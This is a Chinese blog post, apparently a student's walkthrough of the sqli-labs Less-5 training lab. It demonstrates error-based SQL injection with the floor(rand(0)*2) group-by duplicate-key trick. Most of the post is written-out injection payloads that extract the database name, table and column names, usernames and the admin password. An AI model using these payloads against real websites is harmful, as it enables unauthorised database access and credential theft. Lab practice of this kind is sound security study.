例题:Less-5 Double Query- Single Quotes- String
知识点:
报错注入的原理就是搭建一个恒成立的
常见的报错注入
(1)、
大体架构为:
$a=想要执行的语句
$b=floor(rand(0)*2)
select count(*),concat($a$b)
随便输入一个id=1,页面发生变化,说明存在数据交互
输入?id=1'页面如下,说明存在sql注入漏洞、且闭合方式为单引号
利用order by查一下列数
分别输入
?id=1' order by 3 --+ 
?id=1' order by 4 --+
可知现实列数为三
利用union select查找会显列数
输入
?id=1' union select 1,2,3 --+页面显示
说明没有回显列,因而可以尝试报错注入
输入
?id=-1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+触发了唯一索引重复错误,获取数据库名security
下面就是流程化查询工作啦
输入
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security'),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+显示不止一行,那就只能一行一行地显示了,使用 limit 0,1来一个个显示(提问为啥不能使用group_concat,因为:输入以后页面不显示,说明超过过字符长度了)
因此依次输入:
?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 2,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+?id=-1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 3,1),floor(rand(0)*2)) as a from information_schema.tables where table_schema = 'security' group by a --+获得表名分别为emails、referers、uagents、users
user明显信息更加敏感,因此继续开始查询。依次输入
?id=-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name = 'users' limit 0,1),floor(rand(0)*2)) as a from information_schema.columns where table_name = 'users' group by a --+获得列名:id、username、password
?id=-1' union select 1,count(*),concat((select username from users limit 0,1),floor(rand(0)*2)) as a from users group by a --+?id=-1' union select 1,count(*),concat((select username from users limit 0,1),floor(rand(0)*2)) as a from users group by a --+获得: Dumb、Angelina、Dummy、secure、stupid、superman、batman、admin、admin1、admin2、admin3、dhakkan、admin4、
太多了,就查一个admin 的密码吧
?id=-1' union select 1,count(*),concat((select password from users where username ='admin'),floor(rand(0)*2)) as a from users group by a --+获得密码:adimin
完工!这段其实挺难的,我暂时也只是会敲了而已,还需要在后续的学习中去理解。
标签:pte,报错,--+,table,注入,where,id,select,schema From: https://blog.csdn.net/weixin_60113601/article/details/145066918